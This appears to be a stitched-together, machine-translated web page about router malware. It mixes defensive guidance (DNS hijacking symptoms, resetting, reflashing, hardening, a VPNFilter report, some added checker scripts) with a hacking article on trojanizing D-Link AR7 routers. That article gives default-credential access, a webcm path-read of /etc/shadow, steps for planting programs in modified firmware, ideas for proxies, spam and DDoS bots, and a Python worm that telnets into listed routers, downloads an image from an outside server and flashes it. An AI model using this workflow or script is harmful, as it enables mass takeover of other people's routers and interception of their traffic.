
Checking the router for viruses zyxel. Complete list of vulnerable devices

It may seem strange, but there are viruses that infect not computers, laptops or mobile devices, but routers.

Why do this? Although your router stores nothing valuable, access to the device lets an attacker change the DNS server settings. That in turn lets scammers redirect some of your requests to fake sites, where you enter confidential information that is useful to them. Many router models are susceptible to infection; listing them is pointless, since the list is constantly growing. For your safety, I recommend following the recommendations that will help you avoid infection.

How does a virus work?

Your computer gets infected with a virus called Win32.Sector. That in turn downloads Trojan.Rbrute from a dedicated server; the Trojan scans the network for routers and tries to access their configuration. After gaining access, it replaces the DNS addresses configured in the router with its own. From then on, every device connected to the router ends up on the page from which Win32.Sector is downloaded.

  • The "Internet" indicator is on, but most sites cannot be reached, or sites other than the ones you wanted open instead
  • Unknown sites open on their own
  • The computer cannot obtain an IP address from your network (it is assigned an address like 169.254.xxx.xxx, the Microsoft automatic private addressing range)

How to remove the Trojan.Rbrute virus from a router?

  1. First, reset the router to factory settings. To do this, hold down the "Reset" button on the back of the router for about 10 seconds, until all the indicators blink and the router reboots.

  2. Log in to the router's administrator panel and replace the standard admin-panel password with your own, preferably a harder one.

  3. Configure the router again and check that the Internet works properly.

  4. Download the latest firmware for your model from the router manufacturer's official website and flash it. Most likely the latest firmware closes the holes through which the attackers gained access to the router's settings.

  5. After that, check the computer for malware to rule out the possibility that Win32.Sector or Trojan.Rbrute remained on the computer's hard disk. You can do this with the free tools from the article

I hope my article helped you =)

Hello, my reader! In this article I will talk about ADSL routers, wonderful pieces of hardware that are indispensable in home and industrial networks. I will tell you about exploiting these devices for purposes useful to us: sewing a brutal Trojan into the router, in such a way that neither a clever admin nor a clueless user notices.

Wishes, or requirements, regarding IQ

When I wrote this article, I assumed that a reasonably advanced user with GNU/Linux installed, who also has some skills in working and programming in this operating system, would be enough to read it. It appears that my actions can be repeated on Windows (using Cygwin, for example), but that will not be described. For maximum pleasure you will also want skills with a soldering iron (this is optional).

And it all began ...

I got distracted. So, it all started when one day this very piece of hardware, or rather my router, treacherously cut off the Internet connection and refused to restore it. It was far away, and nobody with physical access could look at it (actually, I lied: I was just too lazy to get up off the couch and restart the router :)). The web interface did not respond, but I remembered that this thing must have telnet or ssh. I had not tried the administration area before, and, recklessly, had not changed my account password (as it turned out later, in vain, because by default it is "admin:admin"). So I tried SSH and it worked!

$ ssh admin@192.168.1.1
Password:

Like a bolt from the blue: BusyBox! I had never thought about what this router runs under, and it turns out to be GNU/Linux! I got terribly curious about how everything works here and, mentally thanking laziness and chance, embarked on a study.

Gathering information

So where did I start? Of course, from the list of available commands:

# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes

The set is quite sane, enough for normal research and for implementing ideas. The next thing that aroused interest was the kernel version:

# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le ([email protected]) (gcc version 2.95.3 20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006

For reference: MontaVista is a distribution oriented at embedded systems. The vast majority of network equipment manufacturers prefer it. It can also be found on other devices, for example e-book readers or cell phones.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
processor               : 0
cpu model               : MIPS 4KEc V4.8
BogoMIPS                : 149.91
wait instruction        : no
microsecond timers      : yes
extra interrupt vector  : yes
hardware watchpoint     : yes
VCED exceptions         : not available
VCEI exceptions         : not available

AR7 is a dual-core chip developed by Texas Instruments. It contains a full-fledged ADSL router on one chip, supporting the ADSL1, ADSL2 and ADSL2+ standards. It is based on a high-performance MIPS 4KEc RISC processor clocked at 175 or 233 MHz (depending on the production technology: 18 or 13 microns). The chip has two UART interfaces on board, one of which (UART_A) is used to output debug information, as well as an EJTAG interface that serves for debugging and (re)flashing the Flash memory. The use of these interfaces is described below.

Finally, I looked at the memory information:

# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Naturally, not forgetting about the block addresses:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

From the above, it follows that the Flash memory (/dev/mtdblock) has 5 blocks:

mtd0 - the SquashFs file system image. This is a special compressed read-only file system. Normally it uses the gzip algorithm for compression, but in this case LZMA is used (the compression ratio is higher). The size of this block is 4 MB.

mtd1 - this block contains the MontaVista kernel, compressed with the LZMA algorithm; the block size is 600 KB.

mtd2 - the ADAM2 bootloader, which boots the kernel and also has a service FTP server for recovery and flashing. More about it later. The block size is 64 KB.

mtd3 - a block shared between the configuration data and the environment (environment variables), which can be viewed in /proc/ticfg/env. The configuration data lives in /etc/config.xml. The intermediary between the file system and the configuration block is the closed-source cm_logic program (like all the cm_* programs; more about them later). The size of this block is also 64 KB.

mtd4 - this holds the firmware signature, the kernel and the file system image. This block is used when updating the firmware via the Web interface: the firmware is first stored in this block, then the checksum is verified and, if it matches, the firmware is written to its new position.
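As an added example (not from the original article), here is a small Python script that parses the /proc/mtd and /proc/ticfg/env output quoted above (embedded as sample text copied from those listings) and cross-checks the two views of the flash: each partition's /proc/mtd size against its address range, the number of erase blocks it spans, and which partitions lie inside others. On this listing it shows that mtd4 is simply the span covering mtd1 (kernel) and mtd0 (root file system), which is consistent with the web updater staging a whole firmware there. The same checks are worth running on any firmware dump before writing anything back.

```python
import re

# Sample input copied from the /proc/mtd listing above (kept in the listing's format).
PROC_MTD = """\
dev:    size   erasesize  name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
"""

# Sample input copied from the /proc/ticfg/env listing above: start,end addresses.
TICFG_ENV = """\
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
"""

MTD_RE = re.compile(r'^(mtd\d+):\s+([0-9a-f]+)\s+([0-9a-f]+)\s+"([^"]*)"$')
ENV_RE = re.compile(r'^(mtd\d+)\s+(0x[0-9a-f]+),(0x[0-9a-f]+)$')


def parse_proc_mtd(text):
    """Map partition name -> size / erasesize (bytes) from /proc/mtd output."""
    parts = {}
    for line in text.splitlines():
        m = MTD_RE.match(line.strip())
        if m:  # the header line "dev: size erasesize name" does not match and is skipped
            parts[m.group(1)] = {"size": int(m.group(2), 16),
                                 "erasesize": int(m.group(3), 16),
                                 "name": m.group(4)}
    return parts


def parse_env_ranges(text):
    """Map partition name -> (start, end) addresses from the ADAM2 environment."""
    ranges = {}
    for line in text.splitlines():
        m = ENV_RE.match(line.strip())
        if m:
            ranges[m.group(1)] = (int(m.group(2), 16), int(m.group(3), 16))
    return ranges


def flash_map(proc_mtd, env):
    """Merge both views and record consistency facts for each partition."""
    parts = parse_proc_mtd(proc_mtd)
    ranges = parse_env_ranges(env)
    result = {}
    for name, (start, end) in ranges.items():
        length = end - start
        erasesize = parts.get(name, {}).get("erasesize")
        result[name] = {
            "start": start,
            "end": end,
            "length": length,
            # /proc/mtd size should equal the address span the bootloader reports
            "size_matches": parts.get(name, {}).get("size") == length,
            # how many erase blocks a full rewrite of this partition touches
            "erase_blocks": -(-length // erasesize) if erasesize else None,
            "contains": [],
        }
    # A partition "contains" another when the other's range lies fully inside it.
    for a, ea in result.items():
        for b, eb in result.items():
            if a != b and ea["start"] <= eb["start"] and eb["end"] <= ea["end"]:
                ea["contains"].append(b)
        ea["contains"].sort()
    return result


if __name__ == "__main__":
    for name, entry in sorted(flash_map(PROC_MTD, TICFG_ENV).items()):
        print("%s: 0x%08x-0x%08x len=0x%x size_ok=%s erase_blocks=%s contains=%s" % (
            name, entry["start"], entry["end"], entry["length"],
            entry["size_matches"], entry["erase_blocks"], entry["contains"]))
```

Running it on the listings above reports every size as matching and lists mtd4 as containing mtd0 and mtd1; a mismatch between the two views on a different unit is the first sign that a dump or an environment edit is not what you think it is.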

RAM (16 MB in this model, though ADAM2 on this model sees only 14 MB; this is cured by an update) is mounted at the /var directory, and it can safely be used for our purposes:

# free
              total         used         free       shared      buffers
Mem:          14276        10452         3824            0

Let's not forget to go over the list of processes. The interesting daemons lurking here are: thttpd, the web server; dproxy, a caching DNS proxy server; ddnsd, the DNS daemon; pppd ..., the daemon that implements the PPP connection, and in its parameters we see the account data. So, if the router is not pretending to be a hose (read: is not in bridge mode), you can easily get hold of an account.

The cm_* programs are proprietary and are included in the source tree already compiled (these programs are also developed by Texas Instruments, so D-Link should not be scolded for license non-compliance).

cm_logic - the program that controls the system logic; all configuration goes through it. It synchronizes /etc/config.xml with the corresponding part of the contents of /dev/ticfg (which points to mtd3).

cm_cli - a command-line interface for managing and configuring the system. For example, the connection settings are made through this interface.

cm_pc - starts and monitors processes according to the rules (for example, run the program as a daemon; the rules also include information about which ports to open) described in /etc/progdefs.xml; it is loaded immediately after the kernel.

webcm - the CGI interface, full of holes; for example, it lets you look at /etc/shadow just by referring to a URL.

http://192.168.1.1/../../../etc/shadow

This yields nothing, thttpd is not that simple; but what about this:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

That's another matter. This can be used to gather information when there is no ssh/telnet access but there is access to the web interface.

firmwarecfg - used for flashing via the Web interface. The image is sent to this program's input by a POST request from the Web interface, and it writes the image to Flash memory after checking the image's checksum.

This completes the collection of primary information; it's time to move on to decisive action.

Installing development tools and compiling the firmware

The firmware of D-Link routers (and of all the others based on GNU/Linux) is distributed under the GPL license, and you can get it from the official FTP server. In fact, you can choose any of the firmwares on offer; they are all the same (as regards the T series). The package contains the kernel source code, the environment, the necessary tools and a toolchain for developing and compiling programs. It should be unpacked to the root, and the path to the toolchain's bin directory added to the PATH environment variable:

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

Now, to compile your own firmware, go to the directory with the source code and simply run make.

$ cd DSL/TYLinuxV3/src && make

You will be asked many questions about enabling device support (better to answer them positively). At the end of compilation, firmware images will be created in the TYLinuxV3/images directory. You can also run the script named after your model from the /TYLinuxV3/src/scripts directory.

A few words about transferring files between the router and the computer. The very first method I used was transferring files over SSH with the scp program. A little later I found out that mc (Midnight Commander) can also connect over SSH (Panel -> Shell connection). Alternatively, you can set up a Web or FTP server on your workstation. Later I preferred the Web server, because it is the fastest. I installed thttpd, small and fast, just like on the router. We start it and pull a file to the router after changing to the /var directory (which, as mentioned earlier, is writable).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2/file

To pull a file from the router, you can likewise bring up the web server there:

# thttpd -g -d /var -u root -p 8080

Note that if you want to download an executable file from the router, you should remove its execute permission first. When downloading a large number of files from the router, it's better to use mc: you won't need to copy the files to /var, remove the permissions, and then delete them to free up space. In general, it's a matter of taste; choose whichever option suits you.

Creating your own program

Let's start, of course, with the programming classic, HelloWorld. There are no special rules here. The text of the program is painfully familiar:

#include <stdio.h>   /* printf */
#include <stdlib.h>  /* the header name of the second include was lost in extraction; stdlib.h is assumed */

int main(void)
{
    printf("Mate.Feed.Kill.Repeat.");
    return 0;
}

Compile (the path to the toolchain must be in the PATH environment variable):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

Then on the router:

# cd /var
# chmod +x hell
# ./hell

And ... nothing happens, or a "path not found" notification is thrown. What's the matter? I already spoke about cm_pc: this program launches the others according to the rules described in /etc/progdefs.xml. Now the time has come to modify and flash file system images.

File system modification

To modify the file system, you first need to unpack it. As I mentioned, the file system here is SquashFs with the LZMA patch. The firmware development package includes only the mksquashfs program (to create an image); unsquashfs (for unpacking) is missing. But that doesn't matter: everything is available on the file system's website; we need the first version. Having applied the LZMA patch and built the utilities, we put them in a convenient place. First, we get the file system image from the router:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Now you can modify it as you like, or we can throw our FuckTheWorld into the /bin directory and add a rule to run it in /etc/progdefs.xml.

$ cp hell unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

And add this (between the tags):

hell
/bin/hell

Save and pack it back:

$ mksquashfs unpacked_fs my_fs.img -noappend

Note that the file system image must not exceed the permissible size. If you urgently want to try something and it doesn't fit, remove something "unnecessary" from the image, like grep or whoami, or use the UPX executable packer. Now upload the image to the router and move on to the next section.

Flashing the file system image

The method of flashing the router is very simple: it consists of accessing the device /dev/mtdblock/*. So we upload the file system image to the router in any convenient way and do this simple action:

# cat my_fs.img > /dev/mtdblock/0 && reboot

or

# cp my_fs.img /dev/mtdblock/0 && reboot

After a while, when the write has completed, the router reboots and the changes take effect. Let's try to run our example:

# hell
Mate.Feed.Kill.Repeat.

Recovery methods in case of failure

Before flashing the router with more serious "crafts", you should find out how to act in critical cases, when the router refuses to boot. There are no hopeless situations: the ADAM2 FTP server comes to the rescue. First you need to run an FTP client against ADAM2's IP address, which can be spied in /proc/ticfg/env (the my_ipaddress parameter).

$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

For clarity, you can enable debug mode; then all the debugging information and all FTP responses will be shown.

Login/password: adam2/adam2. The flashing process is very simple. To start, switch the FTP session to binary mode:

ftp> quote MEDIA FLSH

Now we send, for example, a file system image and indicate the destination:

ftp> put fs.img "fs.img mtd0"

We wait for the write to finish, reboot the router and exit the session:

ftp> quote REBOOT
ftp> quit

That's it! As you can see, there is nothing difficult; now if something goes wrong, you can always fix the situation.

For convenience, you should give it a normal IP address, enable automatic boot (so as not to dance with reset) and slightly increase the connection wait time before loading the kernel. All these parameters are stored in environment variables; ADAM2 has special FTP commands for them: GETENV and SETENV (for getting and setting a variable, respectively). In the FTP session, enter the following commands:

ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp> quit

The router reboots, and you can log into ADAM2 at 192.168.1.1:21. If you decide to reflash the kernel image and the kernel refuses to boot, FTP will start by itself. Before flashing modified images, be sure to save the current ones for recovery. In general, you can also change environment variables via /proc/ticfg/env; I just wanted to tell you more about working with FTP.

# echo my_ipaddress 192.168.1.1 > /proc/ticfg/env

And you can check the change like this:

# cat /proc/ticfg/env | grep my_ipaddress

What if you wanted to try reflashing the bootloader, and how should you act in case of failure? Or the router does not start for some reason and there is no access to ADAM2? There is a way out: JTAG, or rather, this chip contains EJTAG (the extended version). It is an interface for in-circuit debugging and programming.

To connect to this interface, we need the computer's LPT port, connectors and 4 resistors. The circuit is very simple.

I hasten to note that flashing via JTAG is not quick; it will take quite a lot of time. So it's worth using only to restore the bootloader, and even then only if nothing else works. To communicate over JTAG, you should use a special program such as UrJTAG. Below is an example of how this interface is used. Establishing a connection:

jtag> cable parallel 0x378 DLC5
jtag> detect

Flash memory detection:

jtag> detectflash 0x30000000 1

Reading Flash Memory:

jtag> readmem 0x30000000 0x400000 fullflash.img

Writing to memory (bootloader):

jtag> flashmem 0x30000000 adam2.img

It is also useful to know about the UART interface (I promised to talk about it earlier). The bootloader (which you can talk to at an early boot stage) and the kernel report, that is, log, to UART_A. When writing modified kernels it is indispensable for debugging. UART, Universal Asynchronous Receiver/Transmitter, is almost always present on microcontrollers.

The adapter circuit is very simple. It is based on just one chip, a TTL level converter: MAX232 for COM and FT232R for USB. The chips are quite common and there will be no problem buying them.

The circuit is assembled on a breadboard (which can be safely placed inside a COM port connector housing) in 20 minutes and brings a lot of benefits. For example, when debugging kernels it is an absolutely irreplaceable solution. And if electronics are not your thing? The way out is USB data cables for old phones; they contain exactly such a UART-USB converter.

Some distribution ideas

Your own proxy/socks on someone else's router is great. As, in fact, is spam over all the router's protocols. This is not a Windows computer, which gets reinstalled every month :). Routers are rarely changed or reflashed. And who besides us would get the idea of a router infection into their heads?

Don't forget, we have all the traffic from the user/network under our control. On more powerful routers it is already possible to hang a DDoS bot. Hide the file, hide the process, intercept writes to the mtd blocks so that our program is not erased: anything you like!

Let's say you are about to start writing a serious program for a router. Good debugging is very important; you will probably have to rewrite/restore images a bunch of times ... This is a very sad prospect. Hands droop a little, especially considering that the rewrite endurance of Flash memory is small (see the memory chip's documentation for details), and there is a prospect of ruining it. But there is a way out! Qemu can emulate AR7! Can you imagine what possibilities and endless convenience that provides? Now nothing prevents us from writing something incredibly cool!

So. You wrote a program, checked it on your own or 1-2 other people's routers, but the whole network is still ahead; infecting manually is dreary, by the 10th router you already start cursing the whole world, and strings of "cat" and "mtd" swim before your eyes. We will write a program to automate this routine ... I chose the Python language.

The work plan is as follows:

  • compile a list of routers, for example using nmap;
  • the script takes IP addresses from the list in order and logs in via telnet with the standard login/password;
  • then the same actions: upload the modified image, overwrite, reboot.

#!/usr/bin/env python
# Encode=UTF-8

import telnetlib, time

SERVER = "http://anyhost.com/fs.image"

for addr in open("iplist.txt"):
    telnet = telnetlib.Telnet(addr)
    telnet.set_debuglevel(1)
    telnet.read_until("login:")
    time.sleep(5)
    telnet.write("admin\n")
    telnet.read_until("Password:")
    telnet.write("admin\n")
    telnet.read_until("#")
    telnet.write("cd /var && wget" + SERVER)
    telnet.read_until("#")
    telnet.write("cat fs.image > /dev/mtdblock/0")
    telnet.read_until("#")
    telnet.write("reboot")
    telnet.close()

The logic of the script is very far from ideal; now I'll explain why. First, you should check the firmware/kernel version and the router model, because there may be serious differences in operation. Further, instead of ready-made firmware, you should pull the file system image from the router, unpack it, modify it and send it back. This eliminates compatibility problems across different models/firmware versions, because stability is the most important thing for you. The virus can also have worm functions, and if you wish you can always bolt a network scanner, an RDP brute-forcer and similar gadgets onto it.

There is another great distribution method. Nothing prevents you from writing a program for Windows that carries (or downloads from your server) a file system image and infects the router with it, if one is present. Distribute this program by all the "standard" means: removable drives, exploits for programs, infecting other programs ... By combining these methods you can create a serious pandemic. Just imagine the picture; after all, such devices are everywhere.

Router protection

Having dug up all this, I thought: how can a router be protected? Otherwise, you see, I'll get hit myself. The first step is to change the user password to a more complex and longer one (the limit is 8 characters), and to change the banners and service greetings (with a hex editor or, preferably, by recompiling the programs) so that nmap and other scanners cannot detect the service versions.

You should also change the ports the daemons listen on. This is done by modifying progdefs.xml. Kill telnet (it's the easiest to brute-force a password for, and the protocol is unprotected, so why do we need it), turn on the firewall, and allow connections to services only from your own IP or MAC address. Also use the firewall to protect the network or computer; it's not there for nothing. A competent rule set will always help you defend yourself.

Conclusion

Many routers and similar devices, not only D-Link ones, are built on the AR7 chip; the list includes Acorp, NetGear, Linksys, Actiontec ... and AR7 is popular together with MontaVista. It follows that, using the same toolchain, you can follow the steps described in the article without special problems.

Think about it: besides malicious actions, you can do something useful or pleasant for yourself and others (I don't argue, the pleasure of hacking cannot be replaced, but still). You can make your own firmware, for example for more powerful routers capable of downloading/distributing torrents ... All models have a USB 1.1 interface, but in the younger models it is not soldered on. Add a USB module and a file system driver to the kernel, equip the router with Flash memory, and in the end you get something like network storage for little money. There are a lot of options, and ideas should arise by the thousands; don't limit yourself, create and create!

Earlier we wrote about DNS spoofing, as a result of which advertisements and ransomware banners appeared on the computer. In some cases the DNS servers had been changed not only in Windows, but also on the router. Technically speaking, DNS substitution is of course not a virus in the classical sense of the word, but a malicious setting, which nevertheless causes a lot of inconvenience.

What is the point of spoofing DNS servers, and what harm does it do

The DNS server is responsible for mapping domain names to IP addresses. Fraudulent DNS servers can map the name of any legitimate site to a different, wrong address and serve spoofed content instead of the genuine one. If such "wrong" DNS servers are configured on the router, then all devices connected to it are in danger.

It looks like this. While browsing, a page suddenly opens offering to update Flash Player or Java, install a free antivirus, download a program that supposedly speeds up and optimizes your PC, or some other seemingly harmless thing. Importantly, the name of a familiar, trusted site may be displayed in the address bar. If the user downloads and runs the proposed file, big problems with the PC will most likely soon begin:

  • The computer may start showing advertisements.
  • Files may be encrypted.
  • When trying to open any site, a demand for payment may appear.
  • The desktop may be blocked by a winlocker, again demanding money for unlocking.
  • The computer may be used to carry out Internet attacks on sites and servers, hack other computers (botnet) and other bad things.

At the same time, as a rule, the PC slows down, the hard disk is accessed constantly, and CPU utilization reaches 100% when idle.

How the router gets infected

As a rule, one of the computers in the local network is infected first. The virus enters the computer when a file is downloaded from the Internet. It then sends requests to the standard addresses of network equipment, may scan cookies, download auxiliary malware (a Trojan) and, as a result, gets into the settings of the router or ADSL modem.

Viruses and Trojans can change router settings (in particular, spoof DNS) if:

1. The web interface uses the standard details: IP, login and password (for example 192.168.1.1, admin/admin).

2. The router's address, login and password are saved in the browser.

Signs of a router infection

(all of them together or separate signs may occur)

1. On devices connected to the router, advertisements pop up, browsers open unwanted tabs/pop-ups on their own, and a full-screen ransomware banner may appear.

2. Some sites do not open. Instead, web pages with strange content or a "404" error are displayed.

3. No Internet access although the WAN/Internet LED is on.

4. The computer obtains an IP address from the range 169.254.*.*
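As an added example (not part of the original article), the Python below turns the signs listed in this section and the earlier DNS-spoofing discussion into checks that can be run over a client's network settings: an automatic 169.254.x.x address, a router still on one of the two default addresses, a DNS server that belongs neither to the LAN nor to an allow-list, and resolver answers that differ from a trusted resolver's. The sample client settings and the resolver answers are constructed; the LAN subnet, allow-list and domain names are assumptions, not data from the page.

```python
import ipaddress

# Constructed sample of what a client on the LAN reports (not captured data).
SAMPLE_CLIENT = {
    "address": "169.254.12.7",                     # what the PC ended up with
    "lan": "192.168.1.0/24",                       # the LAN the router is supposed to serve
    "gateway": "192.168.1.1",
    "dns_servers": ["192.168.1.1", "203.0.113.66"],  # second one is foreign to the LAN
}

# Constructed answers: what the client's resolver returns vs. a resolver we trust.
CONFIGURED_ANSWERS = {"bank.example": "203.0.113.10", "mail.example": "198.51.100.5"}
TRUSTED_ANSWERS = {"bank.example": "198.51.100.20", "mail.example": "198.51.100.5"}

# The two addresses the page says router-cracking malware tries first.
DEFAULT_ROUTER_ADDRESSES = {ipaddress.ip_address("192.168.0.1"),
                            ipaddress.ip_address("192.168.1.1")}
# Automatic private addressing range: the "no address from the router" symptom.
APIPA = ipaddress.ip_network("169.254.0.0/16")


def audit_client(client, allowed_dns=()):
    """Return a sorted list of finding tags for one client's network settings.

    allowed_dns: public resolvers the network owner deliberately uses
    (assumption: any DNS server outside the LAN and not on this list is suspicious).
    """
    findings = []
    lan = ipaddress.ip_network(client["lan"])
    if ipaddress.ip_address(client["address"]) in APIPA:
        findings.append("apipa_address")            # symptom 4 in the list above
    if ipaddress.ip_address(client["gateway"]) in DEFAULT_ROUTER_ADDRESSES:
        findings.append("default_gateway_address")  # router never moved off a default IP
    allowed = {ipaddress.ip_address(a) for a in allowed_dns}
    for server in client["dns_servers"]:
        ip = ipaddress.ip_address(server)
        if ip not in lan and ip not in allowed:
            findings.append("unexpected_dns_server:%s" % ip)
    return sorted(findings)


def compare_resolutions(configured, trusted):
    """Names whose answer from the configured resolver differs from the trusted one."""
    return sorted(name for name, ip in trusted.items() if configured.get(name) != ip)


if __name__ == "__main__":
    print(audit_client(SAMPLE_CLIENT))
    print(compare_resolutions(CONFIGURED_ANSWERS, TRUSTED_ANSWERS))
```

On the constructed client the audit flags all three settings, and the resolution comparison singles out bank.example as the name whose answer was substituted; a clean client on the 192.168.83.0/24 network suggested later on this page, with the router as its only DNS server, produces no findings.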

How to remove a virus from a router

How to protect your router from viruses

1. Update the firmware to the latest version

Go to the manufacturer's website, find your model and download the latest firmware. Read on for the example of TP-Link equipment.

2. Set your own password for the web interface

Not all routers let you change the login. But if you set a complex password, that will be enough.

3. Deny logging in to the router interface from the Internet

4. Change the router's IP address in the local network

Have no doubt that the first thing a router-cracking virus does is try the most popular addresses: 192.168.0.1 and 192.168.1.1. Therefore we advise you to change the third and fourth octets of the local IP address in the LAN settings. Set, for example:

192.168.83.254

After that, all devices on the network will receive IP addresses from the 192.168.83.* range.

After changing the router's local IP, to enter the web interface you will need to enter http://[new address]

5. Install a reliable antivirus on your computer

Even if malware penetrates the computer, it will be neutralized and will not have time to infect the router.

6. Do not save passwords in the browser

I think you are able to remember the password for the router's web interface. Or at least write it down on paper.

In light of the increased incidence of DNS-substituting malware on Internet users' devices, the question of Wi-Fi router security arises. How do you check a router for viruses? How do you remove a virus from a router? The question is complex and simple at the same time. There is a solution!

The virus itself cannot write itself into most modern routers, because of the small amount of memory in the router, but it can zombify the router to participate in a botnet. As a rule, this is a botnet for attacking various servers, or for redirecting and analysing the information streams leaving you for the Internet.

Your passwords and personal correspondence can fall into the hands of intruders!

This needs to be fixed as soon as possible.

  • Resetting the router settings
  • Reflashing the router
  • Reconfiguration

Resetting the router settings

You can reset the router settings by pressing the reset button. Usually this button is on the back of the router, where the LAN ports are. Usually the button is recessed into a hole to avoid accidental presses, so you have to use a toothpick. This deletes the settings changed by the virus and restores the factory settings in their place. I must warn you: if you do not know how to configure the router, you should not reset its settings!

Reflashing the router

Sometimes the virus "uploads" modified firmware to the router. You can remove the virus firmware from the router by reflashing it.

Connect the computer to the router with a LAN cable (a LAN cable comes with any router), or via Wi-Fi if a cable connection is not possible. It is better to connect with a cable! A wireless connection is considered unstable and unsuitable for flashing a router.

After connecting to the router, open a browser (Chrome, Opera, Mozilla, IE) and enter the router's address in the address bar; for ASUS it is 192.168.1.1. On the page that opens, enter the username and password for the router settings: login admin, password admin. If the login and password do not fit, ask whoever set up the router for you; they may have changed them.

Download the firmware from the manufacturer's website and select the firmware file on disk using the router's settings page. For the vast majority of routers the firmware stages are the same.

A few weeks ago, specialists in information security called VPNFilter. As it turned out, main goal of this malware are the routers of the most different manufacturers... One of the first to draw attention to VPNFilter was a team of information security specialists from Cisco Talos.

The malware is constantly being improved by its developers. Was recently discovered new module which uses a man-in-the-middle attack type against incoming traffic... Attackers can modify the traffic passing through the router. They can also redirect any data to their servers without any problems. The virus module was named ssler.

In addition to modifying incoming traffic, ssler can also transfer victim's personal data to its creators. These can be passwords to different kinds resources that cybercriminals then use for different purposes.

To prevent theft personal information usually TLS encryption is used, which malware can bypass. This is done by downgrading HTTPS connections to HTTP traffic that is not protected by anything. The request headers are then replaced, signaling that the access point is vulnerable. Ssler in a special way modifies the traffic of various resources, including Google, Facebook, Twitter and Youtube. The fact is that these services provide additional protection... TO Google example redirects HTTP traffic to HTTPS servers. But the module allows you to bypass this protection so that attackers receive unencrypted traffic.

Since the discovery of the virus, information security experts have been studying its capabilities, and it now turns out to be more dangerous than was thought. Earlier, for example, Cisco experts argued that the cybercriminals' main task was to infect network devices in company offices and in victims' homes, perhaps to form a botnet. Now it turns out that users, or rather their data, are the main goal.

“Initially, when we discovered the virus, we believed that it was created to carry out various kinds of network attacks... But it turned out that this is not at all the main task and capability of the malware. It was created mainly to steal user data and modify traffic. For example, the virus can change traffic in such a way that a client-bank user will see the previous amount in his account, although in fact the money has long been gone,” says the report of the cybersecurity experts.

Interestingly, most of the infected devices are located in Ukraine. Safeguards like HTTP Strict Transport Security are not common there, so user data is at risk. But there are problems in other countries as well: in the USA and Western Europe, for example, many outdated devices do not support HTTPS and continue to use HTTP.
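As an added example (not code from the original article or from Cisco Talos), here is a small Python checker a defender can run against the services they rely on. It classifies what a client sees over plain HTTP (a redirect to https://, a redirect kept on http://, or content in the clear, which is what the downgrade described above would look like from the client side) and whether the HTTPS response carries an HSTS policy. The six-month minimum max-age, the verdict labels and the sample headers are my assumptions.

```python
import http.client
from urllib.parse import urlsplit

MIN_HSTS_MAX_AGE = 15552000  # assumed threshold: smallest max-age (about six months) treated as useful

def parse_hsts(value):
    """Parse a Strict-Transport-Security header value into its directives."""
    policy = {"max_age": None, "include_subdomains": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name, arg = name.lower(), arg.strip().strip('"')
        if name == "max-age" and arg.isdigit():
            policy["max_age"] = int(arg)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
    return policy

def assess_plain_http(status, headers):
    """Classify what a client saw after requesting a site over plain HTTP.
    A healthy service redirects to https://; content served in the clear, or a
    redirect that stays on http://, is what a downgrade at the router looks like."""
    h = {k.lower(): v for k, v in headers.items()}
    if 300 <= status < 400:
        scheme = urlsplit(h.get("location", "")).scheme.lower()
        return "redirects-to-https" if scheme == "https" else "redirects-to-http"
    return "serves-plain-http"

def assess_https(headers):
    """Check whether the HTTPS response carries a usable HSTS policy."""
    h = {k.lower(): v for k, v in headers.items()}
    if "strict-transport-security" not in h:
        return "no-hsts"
    policy = parse_hsts(h["strict-transport-security"])
    if policy["max_age"] is None or policy["max_age"] < MIN_HSTS_MAX_AGE:
        return "weak-hsts"
    return "hsts-ok"

def probe(host, timeout=5):
    """Live check of one host (needs network): (plain-HTTP verdict, HTTPS verdict)."""
    plain = http.client.HTTPConnection(host, timeout=timeout)
    plain.request("GET", "/")
    r = plain.getresponse()
    http_verdict = assess_plain_http(r.status, dict(r.getheaders()))
    plain.close()
    secure = http.client.HTTPSConnection(host, timeout=timeout)
    secure.request("GET", "/")
    https_verdict = assess_https(dict(secure.getresponse().getheaders()))
    secure.close()
    return http_verdict, https_verdict
```

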